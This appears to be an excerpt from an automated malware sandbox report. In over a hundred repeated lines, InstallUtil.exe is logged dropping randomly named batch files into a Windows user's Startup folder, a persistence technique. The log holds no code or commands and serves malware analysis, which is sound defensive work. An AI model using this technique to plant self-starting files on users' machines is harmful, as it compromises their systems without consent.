                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RfXUKQmfKzmnBZYpPm8oOw2u.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\91FjtG5d8Mu7R0hZFaoE9YuL.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dArYapieKDS3mOriXwVea1ZH.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kk0tFcBxArqNuZLONVKNccQ9.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zCp3tcAX5zWepThqbpQcv3Vp.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QYl1LYI6eLuyjSz20JB30bta.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asBZ8wuHHDAJRzMiLzRqRpQF.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IzmNdVOYIlxME3DLm9p1Wo8d.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zaUcC3Pe1Igei62bzfib2Lgh.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QxDXJA7Z6xLrsw7t7yKiytsc.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UQssKesI2uliQ7sIfwOvM5n9.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yo2bOHtMzxxZL1bom4sGHQIE.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uMHc9fDef8Mu32GWDJP5t5su.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\G8ldCvYSMjZMx5lkoyQ6Gvn2.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WRjwqgtLRilPROuQsr5g5A6Y.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lnNEauUE5ISjaPQmGBOxsDf3.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P4cTa1Ex4OzvKUtjHhTKpCVV.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZD6INkMJGFiYItMqV3k0Ldkd.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtZyB8nLuAZWzY9cL759HQik.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RfXUKQmfKzmnBZYpPm8oOw2u.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\91FjtG5d8Mu7R0hZFaoE9YuL.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pIWBIkjKkw1pyL67X81LlMuW.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fV1IOv3XzX0dw8cL656hlcGA.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rVcxREh2h9e98HI2JvGb21V7.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A6JhBFTT0ahcL4Jx3VU57fvL.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gZtCFxlqR0Jhzrk0e43UouaM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fg8k8vWyqYQx0o1Q7REQB6Y1.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e0F2LznfDHjVvc1ZIgjGBTfl.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Iuq59gPB0g4RDHfNUajlbFgV.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nHpplC9DOVhKNIOafnUoxiOu.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mDRxpt9F25D9uZbeaJsspjpJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a9NSv00SQMrlWyCzm4LVScNC.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\moEvd4QfiLLNeBPf2fKoDASn.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CTuYRPLN8CgT4PB5QSqLONlo.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Z9adfxYPwrNPpZuQpK6e32ji.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HkWShiPP36Gpv4T24kJCvlou.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\15kxO4axYz87tjx2F18yoEOB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\k6mBzFjd7L6byeC8koGX6zwd.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reYWUrsGfXdjd232fVT1vkBW.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\50beuzNCvSVaMrqSOp6IcdAU.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TSUKSzjiont3ubOypqhhZvXM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gf9K0uVqiu13maxJpiTH6V5K.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0IVfGkpQqbTNp1pNVMpRFWtI.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HLY28VSs4EqLmIyqaUOTirim.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l1jIVrUtFS0lwUMqub3ii2o5.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bdNzZw7sNnZozpGAOggzJM47.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0vemidTikN0VMvyyqgfUpM9G.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JFT0ZMX7h2Vok8FUmP23B4xM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pYpnQnrOSHLqZa7RxVaX3LWM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nz2Ckg7fITBXGmFKoxjG1u00.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oOhQXmnGTZctAq7jzm8VemBz.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MVSTH2OU1514cyfdjHdKKLX6.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tpmbygrB8VoHP1SuBe596Iom.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6dNGtLUaCGiNt5X3GAVfN2mx.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tMnW1nNhCxc57ShEccGmAfuc.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6YVbkJ2dbTU6iPJjmiDFc28v.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lJKdZUxmZnY2NKvxLXDrjSku.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t848D57sRdga678o3iuE8fs0.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\THlJn0bCoJMkwaJJ1damaKHf.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2BAkuvvH6sPJYNmpYSkgEcI5.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OksJDIkSk9vlxiJRjwqOvBEl.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SbQ0yDAjokdr2V5NsofhcXiW.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RwdyRothHh6h93fgno23ysMA.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DPJLpwNaMsKVDJVgWZDaOfvk.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fPKannmBo94NforWN8ticios.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\D2m62fF9GqYbEVP6vD9j2gxn.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\296oUdYAJhNvgZMPkFJ8Adyi.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xvAX15SR7EcYwQ5Q2lE9XfHz.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c0ucrp3AZ3Gqcb9XOi4ScJgO.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EzK2ceYSUfPRcBaU9TkNfaTf.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\99X2MvCoXuwU3tttFIPQHwHV.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GPBZ3pTErTY3e9leZcqdjvav.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c2kEPMEoB7jKNmSTYgGEhkC.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H6C8H8atjKBB32y6kz0KwOYz.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\o6vfvXn1v5ljIkA7P0OwmNPJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sEO8Bhf0d4Qrw9uimKYvdPbJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uPpk0o97VYSvo6hjGFH0TQqL.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dJvuemiGicObX4Z30kroda9A.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kvtHxdKcRoDqPC1gLyjQuWO9.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i3pPAKGnPRFkr8xt7bRSlRjc.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N4oRjvZiiIUiuyH7qY2tJVxP.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rU6sAXL8ShxvNSFxfztITQEO.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8952IHdifzCOHTQvuvHXTJ1g.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8IR6x2FHYB42LL3QeY8fNCg.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mEdWQV0gAnTaAGqJjmojBkRB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nDxlT2zfYNUQnGhPw0ddY3Jk.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ii1KL5uilzCRnH7PuS8IaglH.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tAqt6IonJ28ek47HWmcHedgJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2JYRr5VJQzScOorgs63t6Yms.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dqz7fQjdgpBOVOEwVuzrvS7L.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rbuXaEpUYfBvSLY1BSq9FAGz.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7BA8WVult1sLOauGc9twvjXt.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\otmHh8LJXxRmJ6wgqiU2xXNN.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tpxByPiHTfm0FXRZ9jVXDXqE.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HEiHPMqfTU2BUzEni0ygFieY.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tCfx7C0T7ChpGlE7H15p1O5u.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QYWpTGBqLRZXJWqN9GgXDdj4.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4golg26ok3AkC3sMSeZWrCjO.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pc0adCuCUlFy3GCkyGaXGVPu.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rgr9vKFddOoI510FsaWGwfMd.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UxkTO6SD1uCvL9HjSQh27cQ2.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wfxQxKS1grbtlbpNfFfWg0ap.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6ay5F8eKgrG8lBN1EHxrDj9a.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QrETgkaDo3FkasRFDjM62pwJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sW90HVv4foncLJ8sPYYq235r.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5zhgboFgxJ3Uc89yF9kUFaaB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\myITKbxjJgcKNVboC3VuR9An.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kYBowvhQTbfkpH7pEHtJjyDD.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RqL7mk3tF50auCgY9TJx4Xx5.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JZs2BdtaVoF2513D2RlX46qg.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YM0LEQEFQcy2LayzrWJLzr2X.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OqCKxxB7rjibzQ1Dve4DDO9p.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kYlPDGvk41C0TPxT1reEBFhp.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v4bWLa58H6i1mhTHOnasQ1vq.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAr643SNguCt1xm73LKTPAoT.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L60mOnprETYU8PVSXxv1TKgu.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDJLaHZLLtRSKU5ceCcvYzy0.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cJFsupPdhex8QpEWXObWONd1.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F2SoYI0VgAOawpvWVdJVVDIM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mm7BesjycQWolvzqUxLCJN2V.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QKgxCepPfryutV6Yrct1aQ8O.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ff4HfnvNq5FdWodG1vRYL2NM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OOHyKTaNRs5i380w7sfoSTrE.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7XCwIQMtq8JrfsfhMk9tIIOj.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MD3aZCK2o3gddU7wGrkeXuBH.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\huKfpDIvxQDlEFuk0ExAiyiY.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EFETrEauohMUCVpzszudURYY.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BG4uaPJ9Dk2ZtFkFmXZqJQN5.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C5bXmg8WFq8GqSN4su9KEIhK.bat
